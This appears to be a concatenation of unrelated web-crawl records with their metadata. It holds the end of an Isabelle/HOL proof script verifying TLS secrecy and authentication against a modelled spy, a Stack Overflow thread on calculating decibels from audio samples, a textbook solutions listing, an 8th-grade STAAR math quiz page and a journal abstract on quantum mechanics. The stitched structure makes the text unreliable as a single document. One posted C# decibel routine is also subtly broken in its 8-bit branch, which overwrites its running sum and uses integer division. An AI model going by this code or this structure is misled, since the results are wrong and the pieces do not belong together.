CX_KB_is_pubKB)\n```\n``` 770 apply (force, simp_all)\n```\n``` 771 txt\\<open>ClientKeyExch\\<close>\n```\n``` 772 apply (blast dest!: PMS_Crypt_sessionK_not_spied)\n```\n``` 773 txt\\<open>ServerResume, ServerFinished: by unicity of PMS\\<close>\n```\n``` 774 apply (blast dest!: Notes_master_imp_Crypt_PMS\n```\n``` 775 dest: Spy_not_see_PMS Notes_Crypt_parts_spies Crypt_unique_PMS)+\n```\n``` 776 done\n```\n``` 777\n```\n``` 778\n```\n``` 779 text\\<open>If A created PMS for B, and B has not leaked his serverK to the Spy,\n```\n``` 780 then it is completely secure: not even in parts!\\<close>\n```\n``` 781 lemma serverK_not_spied:\n```\n``` 782 \"[| Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs;\n```\n``` 783 Says B Spy (Key(serverK(Na,Nb,PRF(PMS,NA,NB)))) \\<notin> set evs;\n```\n``` 784 A \\<notin> bad; B \\<notin> bad; evs \\<in> tls |]\n```\n``` 785 ==> Key (serverK(Na,Nb,PRF(PMS,NA,NB))) \\<notin> parts (spies evs)\"\n```\n``` 786 apply (erule rev_mp, erule rev_mp)\n```\n``` 787 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 788 apply (force, simp_all (no_asm_simp))\n```\n``` 789 txt\\<open>Fake\\<close>\n```\n``` 790 apply blast\n```\n``` 791 txt\\<open>SpyKeys\\<close>\n```\n``` 792 apply (blast dest!: Spy_not_see_MS)\n```\n``` 793 txt\\<open>ClientKeyExch\\<close>\n```\n``` 794 apply (blast dest!: PMS_sessionK_not_spied)\n```\n``` 795 txt\\<open>Oops\\<close>\n```\n``` 796 apply (blast intro: Says_serverK_unique)\n```\n``` 797 done\n```\n``` 798\n```\n``` 799\n```\n``` 800 subsubsection\\<open>Protocol goals: if A receives ServerFinished, then B is present\n```\n``` 801 and has used the quoted values PA, PB, etc. Note that it is up to A\n```\n``` 802 to compare PA with what she originally sent.\\<close>\n```\n``` 803\n```\n``` 804 text\\<open>The mention of her name (A) in X assures A that B knows who she is.\\<close>\n```\n``` 805 lemma TrustServerFinished [rule_format]:\n```\n``` 806 \"[| X = Crypt (serverK(Na,Nb,M))\n```\n``` 807 (Hash\\<lbrace>Number SID, Nonce M,\n```\n``` 808 Nonce Na, Number PA, Agent A,\n```\n``` 809 Nonce Nb, Number PB, Agent B\\<rbrace>);\n```\n``` 810 M = PRF(PMS,NA,NB);\n```\n``` 811 evs \\<in> tls; A \\<notin> bad; B \\<notin> bad |]\n```\n``` 812 ==> Says B Spy (Key(serverK(Na,Nb,M))) \\<notin> set evs -->\n```\n``` 813 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs -->\n```\n``` 814 X \\<in> parts (spies evs) --> Says B A X \\<in> set evs\"\n```\n``` 815 apply (erule ssubst)+\n```\n``` 816 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 817 apply (force, simp_all (no_asm_simp))\n```\n``` 818 txt\\<open>Fake: the Spy doesn't have the critical session key!\\<close>\n```\n``` 819 apply (blast dest: serverK_not_spied)\n```\n``` 820 txt\\<open>ClientKeyExch\\<close>\n```\n``` 821 apply (blast dest!: PMS_Crypt_sessionK_not_spied)\n```\n``` 822 done\n```\n``` 823\n```\n``` 824 text\\<open>This version refers not to ServerFinished but to any message from B.\n```\n``` 825 We don't assume B has received CertVerify, and an intruder could\n```\n``` 826 have changed A's identity in all other messages, so we can't be sure\n```\n``` 827 that B sends his message to A. If CLIENT KEY EXCHANGE were augmented\n```\n``` 828 to bind A's identity with PMS, then we could replace A' by A below.\\<close>\n```\n``` 829 lemma TrustServerMsg [rule_format]:\n```\n``` 830 \"[| M = PRF(PMS,NA,NB); evs \\<in> tls; A \\<notin> bad; B \\<notin> bad |]\n```\n``` 831 ==> Says B Spy (Key(serverK(Na,Nb,M))) \\<notin> set evs -->\n```\n``` 832 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs -->\n```\n``` 833 Crypt (serverK(Na,Nb,M)) Y \\<in> parts (spies evs) -->\n```\n``` 834 (\\<exists>A'. Says B A' (Crypt (serverK(Na,Nb,M)) Y) \\<in> set evs)\"\n```\n``` 835 apply (erule ssubst)\n```\n``` 836 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 837 apply (force, simp_all (no_asm_simp) add: ex_disj_distrib)\n```\n``` 838 txt\\<open>Fake: the Spy doesn't have the critical session key!\\<close>\n```\n``` 839 apply (blast dest: serverK_not_spied)\n```\n``` 840 txt\\<open>ClientKeyExch\\<close>\n```\n``` 841 apply (clarify, blast dest!: PMS_Crypt_sessionK_not_spied)\n```\n``` 842 txt\\<open>ServerResume, ServerFinished: by unicity of PMS\\<close>\n```\n``` 843 apply (blast dest!: Notes_master_imp_Crypt_PMS\n```\n``` 844 dest: Spy_not_see_PMS Notes_Crypt_parts_spies Crypt_unique_PMS)+\n```\n``` 845 done\n```\n``` 846\n```\n``` 847\n```\n``` 848 subsubsection\\<open>Protocol goal: if B receives any message encrypted with clientK\n```\n``` 849 then A has sent it\\<close>\n```\n``` 850\n```\n``` 851 text\\<open>ASSUMING that A chose PMS. Authentication is\n```\n``` 852 assumed here; B cannot verify it. But if the message is\n```\n``` 853 ClientFinished, then B can then check the quoted values PA, PB, etc.\\<close>\n```\n``` 854\n```\n``` 855 lemma TrustClientMsg [rule_format]:\n```\n``` 856 \"[| M = PRF(PMS,NA,NB); evs \\<in> tls; A \\<notin> bad; B \\<notin> bad |]\n```\n``` 857 ==> Says A Spy (Key(clientK(Na,Nb,M))) \\<notin> set evs -->\n```\n``` 858 Notes A \\<lbrace>Agent B, Nonce PMS\\<rbrace> \\<in> set evs -->\n```\n``` 859 Crypt (clientK(Na,Nb,M)) Y \\<in> parts (spies evs) -->\n```\n``` 860 Says A B (Crypt (clientK(Na,Nb,M)) Y) \\<in> set evs\"\n```\n``` 861 apply (erule ssubst)\n```\n``` 862 apply (erule tls.induct, frule_tac CX_KB_is_pubKB)\n```\n``` 863 apply (force, simp_all (no_asm_simp))\n```\n``` 864 txt\\<open>Fake: the Spy doesn't have the critical session key!\\<close>\n```\n``` 865 apply (blast dest: clientK_not_spied)\n```\n``` 866 txt\\<open>ClientKeyExch\\<close>\n```\n``` 867 apply (blast dest!: PMS_Crypt_sessionK_not_spied)\n```\n``` 868 txt\\<open>ClientFinished, ClientResume: by unicity of PMS\\<close>\n```\n``` 869 apply (blast dest!: Notes_master_imp_Notes_PMS dest: Notes_unique_PMS)+\n```\n``` 870 done\n```\n``` 871\n```\n``` 872\n```\n``` 873 subsubsection\\<open>Protocol goal: if B receives ClientFinished, and if B is able to\n```\n``` 874 check a CertVerify from A, then A has used the quoted\n```\n``` 875 values PA, PB, etc. Even this one requires A to be uncompromised.\\<close>\n```\n``` 876 lemma AuthClientFinished:\n```\n``` 877 \"[| M = PRF(PMS,NA,NB);\n```\n``` 878 Says A Spy (Key(clientK(Na,Nb,M))) \\<notin> set evs;\n```\n``` 879 Says A' B (Crypt (clientK(Na,Nb,M)) Y) \\<in> set evs;\n```\n``` 880 certificate A KA \\<in> parts (spies evs);\n```\n``` 881 Says A'' B (Crypt (invKey KA) (Hash\\<lbrace>nb, Agent B, Nonce PMS\\<rbrace>))\n```\n``` 882 \\<in> set evs;\n```\n``` 883 evs \\<in> tls; A \\<notin> bad; B \\<notin> bad |]\n```\n``` 884 ==> Says A B (Crypt (clientK(Na,Nb,M)) Y) \\<in> set evs\"\n```\n``` 885 by (blast intro!: TrustClientMsg UseCertVerify)\n```\n``` 886\n```\n``` 887 (*22/9/97: loads in 622s, which is 10 minutes 22 seconds*)\n```\n``` 888 (*24/9/97: loads in 672s, which is 11 minutes 12 seconds [stronger theorems]*)\n```\n``` 889 (*29/9/97: loads in 481s, after removing Certificate from ClientKeyExch*)\n```\n``` 890 (*30/9/97: loads in 476s, after removing unused theorems*)\n```\n``` 891 (*30/9/97: loads in 448s, after fixing ServerResume*)\n```\n``` 892\n```\n``` 893 (*08/9/97: loads in 189s (pike), after much reorganization,\n```\n``` 894 back to 621s on albatross?*)\n```\n``` 895\n```\n``` 896 (*10/2/99: loads in 139s (pike)\n```\n``` 897 down to 433s on albatross*)\n```\n``` 898\n```\n``` 899 (*5/5/01: conversion to Isar script\n```\n``` 900 loads in 137s (perch)\n```\n``` 901 the last ML version loaded in 122s on perch, a 600MHz machine:\n```\n``` 902 twice as fast as pike. No idea why it's so much slower!\n```\n``` 903 The Isar script is slower still, perhaps because simp_all simplifies\n```\n``` 904 the assumptions be default.\n```\n``` 905 *)\n```\n``` 906\n```\n``` 907 (*20/11/11: loads in 5.8s elapses time, 9.3s CPU time on dual-core laptop*)\n```\n``` 908\n```\n``` 909 end\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6318938,"math_prob":0.77011794,"size":35873,"snap":"2019-35-2019-39","text_gpt3_token_len":10903,"char_repetition_ratio":0.19590732,"word_repetition_ratio":0.1378451,"special_character_ratio":0.34020016,"punctuation_ratio":0.14679033,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95510405,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-23T07:13:18Z\",\"WARC-Record-ID\":\"<urn:uuid:82274f1c-e663-4b14-8c6b-ec4d2043bb8a>\",\"Content-Length\":\"158877\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c5fa5ce5-7786-4cf1-9fe6-324400c6cbad>\",\"WARC-Concurrent-To\":\"<urn:uuid:27f77fdd-6a80-4f5c-b190-e6cd489caf6f>\",\"WARC-IP-Address\":\"131.159.46.82\",\"WARC-Target-URI\":\"http://isabelle.in.tum.de/repos/isabelle/file/91500c024c7f/src/HOL/Auth/TLS.thy\",\"WARC-Payload-Digest\":\"sha1:MXIHTESF5K4L5OL54OGVDOQW7EXXXG6B\",\"WARC-Block-Digest\":\"sha1:55MRCCQ6TN7PVU36TWIN56NCC2G46DNI\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027318011.89_warc_CC-MAIN-20190823062005-20190823084005-00471.warc.gz\"}"}
https://stackoverflow.com/questions/4152201/calculate-decibels
[ "# Calculate decibels\n\nI'm recording mic input using the XNA library (I don't think this is really technology specific, but it never hurts). Every time I get a sample I would like to calculate the decibels. I have done many searches on the internet and not found a rock solid example...\n\nHere is my attempt at calculating decibels from a sample:\n\n`````` double peak = 0;\n\nfor (var i = 0; i < _buffer.Length; i = i + 2)\n{\nvar sample = BitConverter.ToInt16(_buffer, i);\nif (sample > peak)\npeak = sample;\nelse if (sample < -peak)\npeak = -sample;\n}\n\nvar decibel = (20 * Math.Log10(peak/32768));\n``````\n\nIf I output the decibel value to the screen I can see the values get higher as I get louder and lower as I speak softer. However, it always hovers around -40 when I'm absolutely quiet...I would assume it would be -90. I must have a calculation wrong in the block above?? from what I have read on some sites -40 is equivalent to \"soft talking\"...however, it's totally quiet.\n\nAlso, If I mute my mic it goes straight to -90.\n\nAm I doing it wrong?\n\n• there's probably background noises? – mauris Nov 11 '10 at 7:42\n• USEFUL for researchers who find this page: float rms2db(float value) { return 10 * log10(value); } – com.prehensible Feb 28 '16 at 13:29\n\n## 3 Answers\n\nWhen measuring the level of a sound signal, you should calculate the dB from the RMS value. In your sample you are looking at the absolute peak level. A single (peak) sample value determines your dB value, even when all other samples are exactly 0.\n\ntry this:\n\n``````double sum = 0;\nfor (var i = 0; i < _buffer.length; i = i + 2)\n{\ndouble sample = BitConverter.ToInt16(_buffer, i) / 32768.0;\nsum += (sample * sample);\n}\ndouble rms = Math.Sqrt(sum / (_buffer.length / 2));\nvar decibel = 20 * Math.Log10(rms);\n``````\n\nFor 'instantaneous' dB levels you would normally calculate the RMS over a segment of 20-50 ms. Note that the calculated dB value is relative to full-scale. For sound the dB value should be related to 20 uPa, and you will need to calibrate your signal to find the proper conversion from digital values to pressure values.\n\n• And by calibrate you mean that the each client would have to find their zero...because each device and environment will be different? For instance mine, seems to be -40 while everything is silent....would I calibrate that to zero? – Ryan Eastabrook Nov 11 '10 at 15:58\n• Normally you would use a microphone calibrator for that. The calibrator delivers a signal with a very precise known level, say 98 dB. You then measure/record this signal and derive a scale factor (to be multiplied with each sample value) such that the decibel value you calculate is 98 dB. – Han Nov 11 '10 at 17:55\n• The 98dB of the calibrator is relative to 20uPa, so the actual rms pressure level would be 20*10E-6 * 10^(98/20) = 1.59 Pascal. Sometimes you can find the microphone sensitivity in mV/Pa. Then you would only need to know the relation between the voltage on the ADC input and the digital value the ADC delivers. This would allow you to us a known voltage source (or a voltmeter) to calibrate the circuit behind the microphone, and use the microphone sensitivity to get the calibration scale factor. – Han Nov 11 '10 at 18:09\n• Although I don't fully understand all of the algorithms you're describing, I'm convinced you know much more about this than me. ;) – Ryan Eastabrook Nov 12 '10 at 1:07\n• Shouldn't it be: `Math.Sqrt(sum / (_buffer.length/2));` – Grimmace Oct 1 '12 at 19:54\n\nI appreciate Han's post, and wrote a routine that can calculate decibels on 8 and 16 bit audio formats, with multiple channels using his example.\n\n``````public double MeasureDecibels(byte[] samples, int length, int bitsPerSample,\nint numChannels, params int[] channelsToMeasure)\n{\nif (samples == null || length == 0 || samples.Length == 0)\n{\nthrow new ArgumentException(\"Missing samples to measure.\");\n}\n//check bits are 8 or 16.\nif (bitsPerSample != 8 && bitsPerSample != 16)\n{\nthrow new ArgumentException(\"Only 8 and 16 bit samples allowed.\");\n}\n//check channels are valid\nif (channelsToMeasure == null || channelsToMeasure.Length == 0)\n{\nthrow new ArgumentException(\"Must have target channels.\");\n}\n//check each channel is in proper range.\nforeach (int channel in channelsToMeasure)\n{\nif (channel < 0 || channel >= numChannels)\n{\nthrow new ArgumentException(\"Invalid channel requested.\");\n}\n}\n\n//ensure we have only full blocks. A half a block isn't considered valid.\nint sampleSizeInBytes = bitsPerSample / 8;\nint blockSizeInBytes = sampleSizeInBytes * numChannels;\nif (length % blockSizeInBytes != 0)\n{\nthrow new ArgumentException(\"Non-integral number of bytes passed for given audio format.\");\n}\n\ndouble sum = 0;\nfor (var i = 0; i < length; i = i + blockSizeInBytes)\n{\ndouble sumOfChannels = 0;\nfor (int j = 0; j < channelsToMeasure.Length; j++)\n{\nint channelOffset = channelsToMeasure[j] * sampleSizeInBytes;\nint channelIndex = i + channelOffset;\nif (bitsPerSample == 8)\n{\nsumOfChannels = (127 - samples[channelIndex]) / byte.MaxValue;\n}\nelse\n{\ndouble sampleValue = BitConverter.ToInt16(samples, channelIndex);\nsumOfChannels += (sampleValue / short.MaxValue);\n}\n}\ndouble averageOfChannels = sumOfChannels / channelsToMeasure.Length;\nsum += (averageOfChannels * averageOfChannels);\n}\nint numberSamples = length / blockSizeInBytes;\ndouble rootMeanSquared = Math.Sqrt(sum / numberSamples);\nif (rootMeanSquared == 0)\n{\nreturn 0;\n}\nelse\n{\ndouble logvalue = Math.Log10(rootMeanSquared);\ndouble decibel = 20 * logvalue;\nreturn decibel;\n}\n}\n``````\n\nI think Yann means that Decibels are a relative scale. If you're trying to measure the actual Sound Pressure Level or SPL, you would need to calibrate. What you're measuring is dBFS (decibels full-scale, I think). You're measuring how many decibels quieter the signal is than the loudest possible signal the system can represent (the \"full-scale\" signal, or 32768 for these 16-bit samples). That's why all the values are negative.\n\n• Correct, fixing mine up :) – Yann Ramin Nov 11 '10 at 8:15" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9468916,"math_prob":0.9750714,"size":999,"snap":"2019-35-2019-39","text_gpt3_token_len":257,"char_repetition_ratio":0.10251256,"word_repetition_ratio":0.0,"special_character_ratio":0.2862863,"punctuation_ratio":0.1574074,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99422294,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-26T08:35:46Z\",\"WARC-Record-ID\":\"<urn:uuid:caaa4179-7554-42be-b6dc-3a95bf1b419f>\",\"Content-Length\":\"156651\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b393480c-bca3-4a36-90c8-e067dbbf2a62>\",\"WARC-Concurrent-To\":\"<urn:uuid:1bafe469-41f5-4fd0-a729-6fc7748b7562>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://stackoverflow.com/questions/4152201/calculate-decibels\",\"WARC-Payload-Digest\":\"sha1:TPIGL7PJBLPFNCYW2OCY4WWP3G5MD7OX\",\"WARC-Block-Digest\":\"sha1:L6KMC5DO3SJJ6PRNRVUEP5D6VIKG7P2H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027331228.13_warc_CC-MAIN-20190826064622-20190826090622-00434.warc.gz\"}"}
https://studysoup.com/tsg/calculus/424/introduction-to-real-analysis/chapter/20343/8-2
[ "×\n×\n\n# Solutions for Chapter 8.2: Interchange of Limits\n\n## Full solutions for Introduction to Real Analysis | 3rd Edition\n\nISBN: 9780471321484\n\nSolutions for Chapter 8.2: Interchange of Limits\n\nSolutions for Chapter 8.2\n4 5 0 418 Reviews\n12\n5\n##### ISBN: 9780471321484\n\nSince 20 problems in chapter 8.2: Interchange of Limits have been answered, more than 6321 students have viewed full step-by-step solutions from this chapter. Introduction to Real Analysis was written by and is associated to the ISBN: 9780471321484. This expansive textbook survival guide covers the following chapters and their solutions. Chapter 8.2: Interchange of Limits includes 20 full step-by-step solutions. This textbook survival guide was created for the textbook: Introduction to Real Analysis, edition: 3.\n\nKey Calculus Terms and definitions covered in this textbook\n• Additive identity for the complex numbers\n\n0 + 0i is the complex number zero\n\n• Arcsecant function\n\nSee Inverse secant function.\n\n• Arrow\n\nThe notation PQ denoting the directed line segment with initial point P and terminal point Q.\n\n• Circular functions\n\nTrigonometric functions when applied to real numbers are circular functions\n\n• Direction of an arrow\n\nThe angle the arrow makes with the positive x-axis\n\n• equation of a parabola\n\n(x - h)2 = 4p(y - k) or (y - k)2 = 4p(x - h)\n\n• Focal width of a parabola\n\nThe length of the chord through the focus and perpendicular to the axis.\n\n• Frequency table (in statistics)\n\nA table showing frequencies.\n\n• Geometric sequence\n\nA sequence {an}in which an = an-1.r for every positive integer n ? 2. The nonzero number r is called the common ratio.\n\n• Interval\n\nConnected subset of the real number line with at least two points, p. 4.\n\n• kth term of a sequence\n\nThe kth expression in the sequence\n\n• Line of symmetry\n\nA line over which a graph is the mirror image of itself\n\n• Linear function\n\nA function that can be written in the form ƒ(x) = mx + b, where and b are real numbers\n\n• Maximum r-value\n\nThe value of |r| at the point on the graph of a polar equation that has the maximum distance from the pole\n\n• NDER ƒ(a)\n\nSee Numerical derivative of ƒ at x = a.\n\n• Parabola\n\nThe graph of a quadratic function, or the set of points in a plane that are equidistant from a fixed point (the focus) and a fixed line (the directrix).\n\n• Power function\n\nA function of the form ƒ(x) = k . x a, where k and a are nonzero constants. k is the constant of variation and a is the power.\n\n• Terms of a sequence\n\nThe range elements of a sequence.\n\n• Unit circle\n\nA circle with radius 1 centered at the origin.\n\n• Vertical line test\n\nA test for determining whether a graph is a function.\n\n×" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8362574,"math_prob":0.97773767,"size":3996,"snap":"2020-24-2020-29","text_gpt3_token_len":1215,"char_repetition_ratio":0.14779559,"word_repetition_ratio":0.020942409,"special_character_ratio":0.3330831,"punctuation_ratio":0.21406728,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9993624,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-03T06:31:02Z\",\"WARC-Record-ID\":\"<urn:uuid:03a195e3-978d-488e-b466-2f2cc700074d>\",\"Content-Length\":\"39175\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a9ffc4d7-8285-4823-bd0d-44eebbe07e1c>\",\"WARC-Concurrent-To\":\"<urn:uuid:12870898-bef2-4d79-b6c6-0b3ca5b5a9cb>\",\"WARC-IP-Address\":\"54.189.254.180\",\"WARC-Target-URI\":\"https://studysoup.com/tsg/calculus/424/introduction-to-real-analysis/chapter/20343/8-2\",\"WARC-Payload-Digest\":\"sha1:CQ56DNB7D2P6G2ZTC2K7DFYCXTCQRA6I\",\"WARC-Block-Digest\":\"sha1:LYFAOIG25JKPCR6P3V5R34BN52RQDQXM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347432237.67_warc_CC-MAIN-20200603050448-20200603080448-00298.warc.gz\"}"}
https://resources.quizalize.com/view/quiz/staar-test-8th-grade-math-2019-ef5b5218-7e0e-4e53-9058-4477e326de9e
[ "", null, "", null, "STAAR Test - 8th Grade Math (2019)\n\nQuiz by Texas Education Agency\n\nMathematics\nTexas Essential Knowledge and Skills (TEKS)\n\nFeel free to use or edit a copy\n\nincludes Teacher and Student dashboards\n\n### Measures 29 skills fromGrade 8MathematicsTexas Essential Knowledge and Skills (TEKS)\n\n8.4.B: Proportionality\n8.7.A: Expressions, Equations and Relationships\n8.9: Expressions, Equations and Relationships\n8.3.A: Proportionality\n8.5.G: Proportionality\n8.3.C: Proportionality\n8.8.C: Expressions, Equations and Relationships\n8.7.C: Expressions, Equations and Relationships\n8.4.C: Proportionality\n8.10.C: Two-Dimensional Shapes\n8.12.A: Personal Financial Literacy\n8.5.I: Proportionality\n8.5.C: Proportionality\n8.6.A: Expressions, Equations and Relationships\n8.11.A: Measurement and Data\n8.2.D: Number and Operations\n8.4.A: Proportionality\n8.6.C: Expressions, Equations and Relationships\n8.5.D: Proportionality\n8.10.D: Two-Dimensional Shapes\n8.12.D: Personal Financial Literacy\n8.8.B: Expressions, Equations and Relationships\n8.7.B: Expressions, Equations and Relationships\n8.2.C: Number and Operations\n8.8.A: Expressions, Equations and Relationships\n8.5.F: Proportionality\n8.2.B: Number and Operations\n8.8.D: Expressions, Equations and Relationships\n8.5.A: Proportionality\n\nTrack each student's skills and progress in your Mastery dashboards\n\n• edit the questions\n• save a copy for later\n• start a class game\n• view complete results in the Gradebook and Mastery Dashboards\n• automatically assign follow-up activities based on students’ scores\n• assign as homework\n• share a link with colleagues\n• print as a bubble sheet\n\n### Our brand new solo games combine with your quiz, on the same screen\n\nCorrect quiz answers unlock more play!", null, "", null, "42 questions\n• Q1\nOscar buys his lunch in the school cafeteria. The cost of 15 school lunches is \\$33.75. Which graph has a slope that best represents the average cost of the lunches in dollars per lunch?", null, "", null, "", null, "", null, "60s\n8.4.B: Proportionality\n• Q2", null, "60s\n8.7.A: Expressions, Equations and Relationships\n• Q3", null, "60s\n8.9: Expressions, Equations and Relationships\n• Q4", null, "60s\n8.3.A: Proportionality\n• Q5", null, "", null, "", null, "", null, "60s\n8.5.G: Proportionality\n• Q6\n60s\n8.3.C: Proportionality\n• Q7\n60s\n8.8.C: Expressions, Equations and Relationships\n• Q8\n60s\n8.7.C: Expressions, Equations and Relationships\n• Q9", null, "60s\n8.4.C: Proportionality\n• Q10", null, "60s\n8.10.C: Two-Dimensional Shapes\n• Q11\n60s\n8.12.A: Personal Financial Literacy\n• Q12\n60s\n8.5.I: Proportionality\n• Q13", null, "", null, "", null, "", null, "60s\n8.5.C: Proportionality\n• Q14\n60s\n8.8.C: Expressions, Equations and Relationships\n• Q15", null, "60s\n8.6.A: Expressions, Equations and Relationships\n\nTeachers give this quiz to your class" ]
[ null, "data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%2780%27%20height=%2780%27/%3e", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%27261%27%20height=%27114%27/%3e", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.84012926,"math_prob":0.7732589,"size":2919,"snap":"2023-14-2023-23","text_gpt3_token_len":838,"char_repetition_ratio":0.22058319,"word_repetition_ratio":0.18604651,"special_character_ratio":0.2627612,"punctuation_ratio":0.2540453,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9625894,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-30T02:15:27Z\",\"WARC-Record-ID\":\"<urn:uuid:8a402b80-d52d-4e5e-a0a5-c8f292f892d6>\",\"Content-Length\":\"196635\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f6ef88a9-e726-4156-909d-e7dcadc44ca2>\",\"WARC-Concurrent-To\":\"<urn:uuid:52106324-ca36-4343-8b98-746f8441c2b4>\",\"WARC-IP-Address\":\"18.160.10.75\",\"WARC-Target-URI\":\"https://resources.quizalize.com/view/quiz/staar-test-8th-grade-math-2019-ef5b5218-7e0e-4e53-9058-4477e326de9e\",\"WARC-Payload-Digest\":\"sha1:FVTU3EZ4OLP3VN3TRCQJLSKD4MV5PYLI\",\"WARC-Block-Digest\":\"sha1:JXVZPV5FIUCGYZOOQAZ7R4FKWXNXEXJT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224644915.48_warc_CC-MAIN-20230530000715-20230530030715-00426.warc.gz\"}"}
http://umj-old.imath.kiev.ua/article/?lang=en&article=4385
[ "2019\nТом 71\n№ 11\n\n# Energy density and flux in nonrelativistic quantum mechanics\n\nChaus N. N.\n\nAbstract\n\nA number of mathematical consequences of the Schroedinger equation$i\\hbar \\dot \\psi = {\\rm H}_\\psi$ are given and interpreted as local energy and momentum conservation laws. Several Hamiltonians are treated.\n\nEnglish version (Springer): Ukrainian Mathematical Journal 44 (1992), no. 8, pp 990-995.\n\nCitation Example: Chaus N. N. Energy density and flux in nonrelativistic quantum mechanics // Ukr. Mat. Zh. - 1992. - 44, № 8. - pp. 1090–1095.\n\nFull text" ]
[ null ]
